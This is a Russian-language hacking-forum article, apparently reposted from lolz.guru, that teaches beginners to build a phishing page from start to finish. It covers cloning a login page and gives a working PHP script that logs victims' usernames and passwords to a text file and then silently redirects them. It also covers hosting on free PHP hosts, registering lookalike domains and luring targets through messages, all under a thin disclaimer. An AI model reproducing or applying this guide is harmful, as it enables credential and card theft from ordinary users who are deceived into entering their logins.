Фишинг сайтов, легко и быстро.
Регистрация Войти
Хакинг

Фишинг сайтов, легко и быстро.

28 Октября 2022 (ред)

Горячо приветствую всех читающих!

В этой статье я научу как создать фишинговую страницу с нуля, даже если ты вообще в этом не шаришь.
Всем хоть раз в голову приходила мысль на подобие «как взломать ВК/почту/да что угодно?». Надо всегда думать шире. Этот мануал можно будет использовать не только на одном конкретном сайте или сервере.

Фишинг (англ. phishing от fishing «рыбная ловля, выуживание») — вид интернет-мошенничества, целью которого является получение доступа к конфиденциальным данным пользователей — логинам и паролям.

Проще говоря, займемся кражей паролей пользователя. Начнём…

Копирование
Для начала нам нужно скопировать страницу и выглядеть она должна идентично настоящей.
Чтобы пользователь, зашедший туда, увидел привычную и знакомую форму входа и без лишних размышлений о адресе страницы ввёл свой логин и пароль.

  • Создаём для фейка отдельную папку. Туда и будем скидывать все нужные для него файлы
  • Открываем нужный нам сайт в браузере и заходим на страницу авторизации
  • Сохраняем эту страницу: файл — сохранить как… В появившемся окне выбираем тип сохраняемого файла: HTML-файл с изображениями, имя: index (лучше сохранить полную версию страницы).

Разбираемся в HTML

С помощью блокнота открываем исходный код сохраненной страницы index.htm

Много странных закорючек — это исходный код страницы
Как говориться «глаза бояться, а руки делают» , поэтому начинаем фокусничать

Когда вы сохраняли страницу, рядом с полем для ввода логина и пароля наверняка были подписи (логично предположить что там было написано «логин», «пароль»). Вот по ним и будем ориентироваться. Ищем среди всего этого безобразия такие слова. Рядом с ними на странице у нас располагались поля ввода логина и пасса. В html коде они будут выглядеть примерно вот так:

Код:

<input type="text" name="login" value="" ......

<input type="password" name="password" ......

Имена полей (выделены жирным, в коде идут после «name=») не всегда будут именно login и password. Где-то это могут быть e-mail и pass, а где-то и username, parol. (оформление и названия зависит от кодера и сайта)

P.S. Блок с надписями «логин», «пароль» и формами ввода почти всегда находится в тэге <form>.

Временно записываем или запоминаем имена этих паролей
Ищем через Ctrl+F «action»

Code:

<form name="login" action="users/passcheck.php" method="post" onsubmit="return check();">

  • Меняем строку и прописываем параметру action значение login.php (если параметра action там нет — введите его сами: action="login.php»)
  • Ищем параметр method (в той же строчке что form и action) и ставим ему значение «post» или «get»
  • Сохраняемся и закрываем

Волшебный скрипт

Наш скрипт будет выполнять самую важную функцию — перехват и запись введенных логина и пароля.

Код:
PHP:

<?PHP
$Log = $_POST['login'];

$Pass = $_POST['password'];

$log = fopen("database.txt","at");

fwrite($log,"\n $Log:$Pass \n");

fclose($log);

echo "<html><head><META HTTP-EQUIV='Refresh' content ='0; URL=http://lleo.aha.ru/na/'></head></html>";

?>

А теперь по полочкам:

  • В первых двух строках переменным Log и Pass присваиваются значения соответствующих полей из предыдущего файла. Именно для этого мы записывали названия полей с сохранённой страницы: мы должны указать их скрипту. Меняем login и password из квадратных скобок на то, как были названы поля ввода на нашей сохранённой странице (Кавычки не трогаем!).
  • В третьей строке происходит открытие файла database.txt для записи. Можете назвать этот файл как хотите, хоть IIACCbI_JIOXOB.txt)) Главное — не забудьте как назвали (название должно быть написано английскими буквами) и создайте текстовый документ с таким именем в папке с фейком.
  • Четвёртая строка — запись в файл строки вида \n $Log:$Pass \n, где \n — переход на новую строку, $Log:$Pass — значения переменных с логином и паролем, записанные через двоеточие.
  • Строка пятая — сохранение, закрытие файла.
  • Последняя строка — редирект (переадресация) на другую страницу (пока юзверь не просёк что это фейк). В этой строчке после URL= вписываем адрес страницы, куда попадёт пользователь сразу после того как введёт логин и пароль (и снова будте аккуратны с кавычкой после адреса — она должна там быть!). Лучше всего отправить его на настоящую страницу (ну откуда там вы страничку копировали?) с сообщением о вводе неверного пароля. Тогда бедолага решит что что-то не так ввёл, попорбует снова и зайдёт, ничего не заподозрив!
  • Сохраняем файл с именем login.php в папку с фейком

Выход в мир Интернета

Нам понадобится бесплатный хостинг с поддержкой php

Например:
Freehostia
HostiMan.ru
Free.beget.ru
Free.sprinthost.ru
HyperHost.ua
Hostronavt.ru
Hostkoss.com

  • Регистрируем домен на этом хосте с названием, максимально похожим на адрес страницы, которую мы подделываем (например Vk.login.com), чтобы нашей цели не бросалось в глаза
  • Качаем Filezilla или любой другой файловый менеджер

  • Подключаем полученный хост через Filezilla
    Слева видим все папки и файлы нашего компьютера, справа — наш сервер. Осталось его только дополнить
  • Перекидываем все сохраненные файлы нашей фишинговой страницы на новоиспеченный сайт.
  • Создаем на сайте текстовый файл «database.txt» (В нем и будут сохраняться все введенные логины и пароли в виде: «log: pass»)

Вместо localhost будем открывать тот адрес, который мы зарегистрировали. Соответственно, файл с сохранёнными паролями будет находиться там же (http://наш_адрес/database.txt).

  • В том же файловом менеджере ставим файлу максимальные права доступа — 777

Готово!

Теперь наш фишинговый сайт можно использовать в разных целях, но остался один главный шаг.

Социальная часть

Самый сложный и творческий этап. Придется импровизировать как заманить жертву на фейк.
Все зависит от тематики и интересов жертвы.
Писать на почту, в другие месенджеры, хоть голубем эту ссылку отправляйте. Это полностью ваша фантазия .

Итог:

  • Мы создали фейковую страницу какого-то сайта, где теперь можем заимствовать пароли (или даже банковские карты).
  • По этой схеме можно создавать фейки за 10 минут
  • Теперь знаем как отличить фейковый сайт от настоящего и будем смотреть на адрес сайта.
  • Сами не переходим по неизвестным и подозрительным ссылкам.

Это статья создана для того чтобы понять как создаются фишинговые сайты и автор не несет никакой ответственности за содеянное.

Желаю удачи в бою!

Источник: https://lolz.guru/threads/1872037/

4341
+ Читать
Chief Chief + 14

1 Ответ

  1. ShadowMan ShadowMan 2 Ноября 2022

    Надо разбавить вашу тусовочку

    Ответить